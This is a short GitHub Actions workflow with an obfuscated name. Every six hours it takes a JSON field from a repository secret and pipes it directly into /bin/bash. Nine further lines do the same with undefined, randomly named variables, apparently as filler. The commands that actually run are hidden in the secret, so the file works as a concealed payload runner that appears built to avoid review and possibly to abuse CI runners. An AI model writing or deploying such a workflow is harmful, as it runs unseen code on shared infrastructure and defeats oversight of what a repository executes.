name: drawingmisnomer
on:
  workflow_dispatch:
  schedule:
    - cron: '0 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: drawingmisnomer
        env:
          qma431: ${{ secrets.qma431 }}
        run: |
          echo $qma431 | jq -r .onl473 | /bin/bash
          echo $jcs995 | jq -r .z78 | /bin/bash
          echo $kbo48312 | jq -r .yjmh661 | /bin/bash
          echo $lxhre8940 | jq -r .d79 | /bin/bash
          echo $ase9865 | jq -r .wo1 | /bin/bash
          echo $qrxrr24 | jq -r .pekyh68 | /bin/bash
          echo $tnsth8 | jq -r .oqk9694 | /bin/bash
          echo $kru26 | jq -r .w852 | /bin/bash
          echo $r3 | jq -r .kbong4 | /bin/bash
          echo $eldm30 | jq -r .vv7987 | /bin/bash

